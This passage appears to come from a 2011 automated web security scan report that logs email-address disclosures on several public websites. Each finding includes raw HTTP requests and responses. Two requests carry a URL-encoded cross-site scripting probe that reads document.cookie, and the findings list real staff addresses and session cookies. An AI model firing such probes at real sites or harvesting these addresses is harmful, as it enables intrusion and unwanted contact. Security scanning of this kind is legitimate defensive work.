s d..tum megad..sa sz..ks..ges (pl. {date}).",dateInFormatMDY:'Val..s d..tum megad..sa sz..ks..ges .........HH.NN. form..ban. (pl. "1999.12.31.")',email:'Val..s e-mail c..m megad..sa sz..ks..ges (pl. "fred@domain.hu").',url:"Val..s URL megad..sa sz..ks..ges (pl. http://www.google.com).",currencyDollar:"Val..s p..nz..sszeg megad..sa sz..ks..ges (pl. 100.00 Ft.).",oneRequired:"Az al..bbi mez..k legal..bb egyik..nek
...[SNIP]...
ri.",dateSuchAs:"Inserire una data valida del tipo {date}",dateInFormatMDY:'Inserire una data valida nel formato MM/GG/AAAA (es.: "12/31/1999")',email:'Inserire un indirizzo email valido. Per esempio "nome@dominio.com".',url:'Inserire un indirizzo valido. Per esempio "http://www.dominio.com".',currencyDollar:'Inserire un importo valido. Per esempio "$100.00".',oneRequired:"Completare almeno uno dei campi richiesti.
...[SNIP]...
",dateSuchAs:"Vul een geldige datum in, zoals {date}",dateInFormatMDY:'Vul een geldige datum, in het formaat MM/DD/YYYY (bijvoorbeeld "12/31/1999")',email:'Vul een geldig e-mailadres in. Bijvoorbeeld "fred@domein.nl".',url:"Vul een geldige URL in, zoals http://www.google.nl.",currencyDollar:"Vul een geldig $ bedrag in. Bijvoorbeeld $100.00 .",oneRequired:"Vul iets in bij in ieder geval een van deze velden.",warni
...[SNIP]...
nn en gyldig dato, som {date}",dateInFormatMDY:'Vennligst skriv inn en gyldig dato, i formatet MM/DD/YYYY (for eksempel "12/31/1999")',email:'Vennligst skriv inn en gyldig epost-adresse. For eksempel "espen@domene.no".',url:"Vennligst skriv inn en gyldig URL, for eksempel http://www.google.no.",currencyDollar:"Vennligst fyll ut et gyldig $ bel....p. For eksempel $100.00 .",oneRequired:"Vennligst fyll ut noe i mins
...[SNIP]...
As:"Prosimy poda.. prawid..ow.. dat.. w formacie: {date}",dateInFormatMDY:'Prosimy poda.. poprawn.. date w formacie DD.MM.RRRR (i.e. "12.01.2009")',email:'Prosimy poda.. prawid..owy adres e-mail, np. "jan@domena.pl".',url:"Prosimy poda.. prawid..owy adres URL, np. http://www.google.pl.",currencyDollar:"Prosimy poda.. prawid..ow.. sum.. w PLN. Dla przyk..adu: 100.00 PLN.",oneRequired:"Prosimy wype..ni.. chocia..
...[SNIP]...
dos.",dateSuchAs:"Digite uma data v..lida, como {date}",dateInFormatMDY:'Digite uma data v..lida, como DD/MM/YYYY (por exemplo, "31/12/1999")',email:'Digite um endere..o de email v..lido. Por exemplo "nome@dominio.com".',url:"Digite uma URL v..lida. Exemplo: http://www.google.com.",currencyDollar:"Digite um valor em dinheiro v..lido. Exemplo: R$100,00 .",oneRequired:"Digite algo para pelo menos um desses campos.",e
...[SNIP]...
permitidos.",dateSuchAs:"Digite uma data v..lida, como {date}",dateInFormatMDY:'Digite uma data v..lida, como DD/MM/YYYY (p.ex. "31/12/1999")',email:'Digite um endere..o de email v..lido. Por exemplo "fred@domain.com".',url:"Digite uma URL v..lida, como http://www.google.com.",currencyDollar:"Digite um valor v..lido $. Por exemplo $ 100,00. ",oneRequired:"Digite algo para pelo menos um desses insumos.",errorPrefix
...[SNIP]...
.......... ........ .. .............. ..../..../........ (................ "12/31/1999")',email:'...................., .............. .................... ..........-........... ...... .............. "fred@domain.com".',url:"...................., .............. .................... ............ ........ http://www.google.com.",currencyDollar:"...................., .............. .......... .. ................. ...
...[SNIP]...
.",dateSuchAs:"Prosim, vnesite pravilen datum kot {date}",dateInFormatMDY:'Prosim, vnesite pravilen datum kot MM.DD.YYYY (primer "12.31.1999")',email:'Prosim, vnesite pravilen email naslov. Na primer "fred@domain.com".',url:"Prosim, vnesite pravilen URL kot http://www.google.com.",currencyDollar:"Prosim, vnesit epravilno vrednost .... Primer 100,00... .",oneRequired:"Prosimo, vnesite nekaj za vsaj eno izmed teh po
...[SNIP]...
..r till..tna.",dateSuchAs:"Ange ett giltigt datum som t.ex. {date}",dateInFormatMDY:'Ange ett giltigt datum som t.ex. YYYY-MM-DD (i.e. "1999-12-31")',email:'Ange en giltig e-postadress. Till exempel "erik@domain.com".',url:"Ange en giltig webbadress som http://www.google.com.",currencyDollar:"Ange en giltig belopp. Exempelvis 100,00.",oneRequired:"V..nligen ange minst ett av dessa alternativ.",errorPrefix:"Fel: "
...[SNIP]...
........... ........ .. .............. ..../..../........ (.................. "12/31/2009").',email:'.............. ................ ............ ...................... .......... (.................. "name@domain.com").',url:".............. ................ ................-.................. (.................. http://www.google.com).",currencyDollar:'.............. ........ .. .............. (..................
...[SNIP]...
chAs:".......................................{date}...",dateInFormatMDY:'..........................................YYYY-MM-DD ("2010-12-31")...',email:'................................................"fred@domain.com"...',url:".................. Url ..................http://www.google.com...",currencyDollar:".............................................100.0",oneRequired:"........................",errorPrefix:"...
...[SNIP]...
As:".......................................{date}... ",dateInFormatMDY:'..........................................YYYY-MM-DD ("2010-12-31")... ',email:'................................................"fred@domain.com"... ',url:"..................Url ..................http://www.google.com... ",currencyDollar:".............................................100.0",oneRequired:"........................ ",errorPrefix:".
...[SNIP]...

24.127. http://whdhstore.hipcricket.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://whdhstore.hipcricket.com
Path:	/

Issue detail

The following email address was disclosed in the response:

support@hipcricket.com

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Content-Length: 19423
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/
Cache-control: private

<style type="text/css">
/* classic styles pulled in from old template - using arial instead of TNR */
td {font-family:Arial; font-size:12px;color:#000000;}
p {font-family:Arial; font-size:12px;}
...[SNIP]...
</b> to 88709 for information, or contact support@hipcricket.com, 1-866-HIP-CRIK (866.447.2745).

</td>
...[SNIP]...

24.128. http://widgets.twimg.com/j/2/widget.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.twimg.com
Path:	/j/2/widget.css

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

GET /j/2/widget.css HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "9842b420d8c91a4cbb004d17a5d54054"
If-Modified-Since: Tue, 14 Dec 2010 23:10:03 GMT

Response

HTTP/1.0 200 OK
x-amz-id-2: EGWBkhJRtQkDVupkcmkaSoV7wa3qBtou2RcZFfVgr3IWQ4FhGTwapCvXdV7NTaqP
x-amz-request-id: 56D9424480C1667F
Date: Fri, 21 Jan 2011 01:03:15 GMT
Last-Modified: Tue, 14 Dec 2010 23:10:03 GMT
ETag: "9842b420d8c91a4cbb004d17a5d54054"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3430
Server: AmazonS3
Age: 61194
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 523997ad92795ec47088daa080f5256d49f50a46cda43a67b48a722373c64af5961ab058c079ced2
Via: 1.0 389a96c30b7b40b8998a142737da95e1.cloudfront.net:11180 (CloudFront), 1.0 ee223c9485216db689cd5d610eaee715.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

24.129. http://widgets.twimg.com/j/2/widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.twimg.com
Path:	/j/2/widget.js

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

GET /j/2/widget.js HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "c02141e97f0cc82d13608bbc020f8322"
If-Modified-Since: Tue, 14 Dec 2010 23:09:56 GMT

Response

HTTP/1.0 200 OK
x-amz-id-2: +nDSdc8fBWJz685Vfcm5xJb65QpQfrCI1Pb7elhqajEjhzWfZrMSzlTQjyKMhXKN
x-amz-request-id: 3777807EE792CDAD
Date: Fri, 21 Jan 2011 17:44:48 GMT
Last-Modified: Tue, 14 Dec 2010 23:09:56 GMT
ETag: "c02141e97f0cc82d13608bbc020f8322"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 29952
Server: AmazonS3
Age: 23589
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 85beeaf9509661af25f261ab4dc0ed6570d49e24d8444699d6778f9d7622d3dc5d1e7c01b8cc9897
Via: 1.0 b6a19ce57eb7f67ba86fc485bfe1effb.cloudfront.net:11180 (CloudFront), 1.0 ee223c9485216db689cd5d610eaee715.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

24.130. http://www.aerotrader.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aerotrader.com
Path:	/sell/

Issue detail

The following email address was disclosed in the response:

customerservice@aerotrader.com

Request

GET /sell/ HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.131. http://www.americascupmedia.com/scripts/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.americascupmedia.com
Path:	/scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /scripts/jquery.cookie.js HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:32 GMT
Server: Apache
Last-Modified: Tue, 22 Jun 2010 09:00:35 GMT
ETag: "20c4781-f61-4899aa78012c0"
Accept-Ranges: bytes
Content-Length: 3937
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

24.132. http://www.americascupmedia.com/scripts/overlib.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.americascupmedia.com
Path:	/scripts/overlib.js

Issue detail

The following email address was disclosed in the response:

erik@bosrup.com

Request

GET /scripts/overlib.js HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:32 GMT
Server: Apache
Last-Modified: Tue, 22 Jun 2010 09:00:36 GMT
ETag: "20c479c-a013-4899aa78f5500"
Accept-Ranges: bytes
Content-Length: 40979
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript

//\////////////////////////////////////////////////////////////////////////////////////\ overLIB 3.50 -- This notice must remain untouched at all times.//\ Copyright Erik Bosrup 1998-2001. All rights reserved.//\ By Erik Bosrup (erik@bosrup.com). Last modified 2001-08-28.//\ Portions by Dan Steinman (dansteinman.com). Additions by other people are//\ listed on the overLIB homepage.//\//\ Get the latest version at http://www.bosrup.co
...[SNIP]...

24.133. http://www.aspirationtech.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aspirationtech.org
Path:	/

Issue detail

The following email address was disclosed in the response:

info@aspirationtech.org

Request

GET / HTTP/1.1
Host: www.aspirationtech.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.134. http://www.atvtraderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atvtraderonline.com
Path:	/research/resources/

Issue detail

The following email address was disclosed in the response:

advertising@atvtraderonline.com

Request

GET /research/resources/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.135. http://www.atvtraderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atvtraderonline.com
Path:	/sell/

Issue detail

The following email address was disclosed in the response:

customerservice@cycletrader.com

Request

GET /sell/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.136. http://www.aub.edu.lb/main/aub_files/Pages/contacts.aspx/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aub.edu.lb
Path:	/main/aub_files/Pages/contacts.aspx/x22

Issue detail

The following email addresses were disclosed in the response:

abuse@aub.edu.lb
admissions@aub.edu.lb
communications@aub.edu.lb
feedback@aub.edu.lb
follow_acd@aub.edu.lb
help@aub.edu.lb
registrar@aub.edu.lb
security@aub.edu.lb

Request

GET /main/aub_files/Pages/contacts.aspx/x22 HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:43 GMT
Server: Microsoft-IIS/7.0
Cache-Control: private
Content-Length: 91439
Content-Type: text/html; charset=utf-8
Expires: Mon, 24 Jan 2011 16:06:43 GMT
Vary: *
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
X-Cache: MISS from 193.188.129.14
Via: 1.1 www.aub.edu.lb
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html __expr-val-dir="ltr" dir="ltr">

<head><meta name="GENERATOR" content="Microsoft Share
...[SNIP]...
<a title="" href="mailto:communications@aub.edu.lb">
...[SNIP]...
<a href="mailto:admissions@aub.edu.lb">
...[SNIP]...
<a href="mailto:registrar@aub.edu.lb">
...[SNIP]...
<a href="mailto:follow_acd@aub.edu.lb">
...[SNIP]...
<a title="" href="mailto:help@aub.edu.lb">
...[SNIP]...
<a title="" href="mailto:feedback@aub.edu.lb">
...[SNIP]...
<a title="" href="mailto:abuse@aub.edu.lb">
...[SNIP]...
<a title="" href="mailto:security@aub.edu.lb">
...[SNIP]...

24.137. http://www.aub.edu.lb/tour/admissions/AUB-VR_196.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aub.edu.lb
Path:	/tour/admissions/AUB-VR_196.html/x22

Issue detail

The following email addresses were disclosed in the response:

feedback@aub.edu.lb
webmaster@aub.edu.lb

Request

GET /tour/admissions/AUB-VR_196.html/x22 HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:47 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Via: 1.1 www.aub.edu.lb
Connection: close
Content-Length: 22310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>American University of Beirut, AUB - private, independent unive
...[SNIP]...
<a href="mailto:feedback@aub.edu.lb" class="contact">feedback@aub.edu.lb</a>
...[SNIP]...
<a href="mailto:webmaster@aub.edu.lb" class="contact">webmaster@aub.edu.lb</a>
...[SNIP]...

24.138. http://www.aub.edu.lb/tour/admissions/AUB-VR_196.html/x22/x3e/x3cli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aub.edu.lb
Path:	/tour/admissions/AUB-VR_196.html/x22/x3e/x3cli

Issue detail

The following email addresses were disclosed in the response:

feedback@aub.edu.lb
webmaster@aub.edu.lb

Request

GET /tour/admissions/AUB-VR_196.html/x22/x3e/x3cli HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:46 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Via: 1.1 www.aub.edu.lb
Connection: close
Content-Length: 22310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>American University of Beirut, AUB - private, independent unive
...[SNIP]...
<a href="mailto:feedback@aub.edu.lb" class="contact">feedback@aub.edu.lb</a>
...[SNIP]...
<a href="mailto:webmaster@aub.edu.lb" class="contact">webmaster@aub.edu.lb</a>
...[SNIP]...

24.139. http://www.aub.edu.lb/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aub.edu.lb
Path:	/x22

Issue detail

The following email addresses were disclosed in the response:

feedback@aub.edu.lb
webmaster@aub.edu.lb

Request

GET /x22 HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:38 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Via: 1.1 www.aub.edu.lb
Connection: close
Content-Length: 22310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>American University of Beirut, AUB - private, independent unive
...[SNIP]...
<a href="mailto:feedback@aub.edu.lb" class="contact">feedback@aub.edu.lb</a>
...[SNIP]...
<a href="mailto:webmaster@aub.edu.lb" class="contact">webmaster@aub.edu.lb</a>
...[SNIP]...

24.140. http://www.aub.edu.lb/x22/x3e/x3cli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aub.edu.lb
Path:	/x22/x3e/x3cli

Issue detail

The following email addresses were disclosed in the response:

feedback@aub.edu.lb
webmaster@aub.edu.lb

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:37 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Via: 1.1 www.aub.edu.lb
Connection: close
Content-Length: 22310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>American University of Beirut, AUB - private, independent unive
...[SNIP]...
<a href="mailto:feedback@aub.edu.lb" class="contact">feedback@aub.edu.lb</a>
...[SNIP]...
<a href="mailto:webmaster@aub.edu.lb" class="contact">webmaster@aub.edu.lb</a>
...[SNIP]...

24.141. http://www.autobytel.com/content/home/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The following email addresses were disclosed in the response:

ConsumerCare@autobytel.com
classifieds@Autobytel.com

Request

Response

24.142. http://www.autobytel.com/content/home/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The following email addresses were disclosed in the response:

ABTPrivacy@autobytel.com
consumercare@autobytel.com

Request

Response

24.143. http://www.autobytel.com/content/home/help/index.cfm/action/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The following email address was disclosed in the response:

consumercare@autobytel.com

Request

Response

24.144. http://www.autobytel.com/content/home/help/index.cfm/action/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The following email addresses were disclosed in the response:

ConsumerCare@autobytel.com
classifieds@autobytel.com
investor@pondel.com
jimh@autobytel.com
johnsteerman@autobytel.com
joselync@autobytel.com
jrosen@autobytel.com
marks@autobytel.com
products@autobytel.com
scottp@autobytel.com
stevel@autobytel.com
taraw@autobytel.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36606

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<A HREF="mailto:ConsumerCare@autobytel.com" CLASS="link">ConsumerCare@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:classifieds@autobytel.com" CLASS="link">classifieds@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:marks@autobytel.com" CLASS="link">marks@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:marks@autobytel.com" CLASS="link">marks@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:investor@pondel.com" CLASS="link">investor@pondel.com</A>
...[SNIP]...
<A HREF="mailto:jimh@autobytel.com" CLASS="link">jimh@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:scottp@autobytel.com" CLASS="link">scottp@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:taraw@autobytel.com" CLASS="link">taraw@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:products@autobytel.com" CLASS="link">products@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:products@autobytel.com" CLASS="link">products@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:johnsteerman@autobytel.com" CLASS="link">johnsteerman@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:stevel@autobytel.com" CLASS="link">stevel@autobytel.com</A>
...[SNIP]...
<a href="mailto:jrosen@autobytel.com" class="link">jrosen@autobytel.com</a>
...[SNIP]...
<A HREF="mailto:joselync@autobytel.com" CLASS="link">joselync@autobytel.com</A>
...[SNIP]...

24.145. http://www.autobytel.com/content/home/help/index.cfm/action/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The following email addresses were disclosed in the response:

ABTPrivacy@autobytel.com
consumercare@autobytel.com

Request

Response

24.146. http://www.autobytel.com/content/home/help/index.cfm/action/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The following email addresses were disclosed in the response:

ConsumerCare@autobytel.com
consumercare@autobytel.com

Request

Response

24.147. http://www.autocheck.com/consumers/javascripts/jquery.hoverIntent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/consumers/javascripts/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /consumers/javascripts/jquery.hoverIntent.js HTTP/1.1
Host: www.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.312031295921916242; referralCookie=cQ2iP5kQz9HfdyY962; JSESSIONID=cQ2iP5kQz9HfdyY962; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442; op327homepage1gum=a03n09k08o271pm06i39i515f; op327homepage1liid=a03n09k08o271pm06i39i515f

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:18:45 GMT
Server: Apache
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Last-Modified: Thu, 13 Jan 2011 19:32:46 GMT
ETag: "273962-11fd-4d2f535e"
Accept-Ranges: bytes
Content-Length: 4605
Content-Type: application/x-javascript

.../**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.148. http://www.autocheck.com/consumers/javascripts/main_javascript.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/consumers/javascripts/main_javascript.js

Issue detail

The following email address was disclosed in the response:

stamhankar@hotmail.com

Request

GET /consumers/javascripts/main_javascript.js HTTP/1.1
Host: www.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.312031295921916242; referralCookie=cQ2iP5kQz9HfdyY962; JSESSIONID=cQ2iP5kQz9HfdyY962; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442; op327homepage1gum=a03n09k08o271pm06i39i515f; op327homepage1liid=a03n09k08o271pm06i39i515f

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:18:44 GMT
Server: Apache
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Last-Modified: Thu, 13 Jan 2011 19:32:46 GMT
ETag: "273963-ae28-4d2f535e"
Accept-Ranges: bytes
Content-Length: 44584
Content-Type: application/x-javascript

<!--
function submitform()
{
displayWaitPage();
}

function getBuyNow()
{
for (var i=0; i < document.buyNow.threeOptions.length; i++)
{
if (document.buyNow.threeOptions[i].checked)
{

...[SNIP]...
}
if (fields.length > 0) {
focusField.focus();
alert(fields.join('\n'));
}
return bValid;
}

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function checkEmail(emailStr) {
if (emailStr.length == 0) {
return true;
}
var emailPat=/^(.+)@(.+)$/;
var sp
...[SNIP]...

24.149. http://www.autotraderclassics.com/find/index.xhtml/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/find/index.xhtml/x22

Issue detail

The following email addresses were disclosed in the response:

classicscustomerservice@autotrader.com
youremail@address.com

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
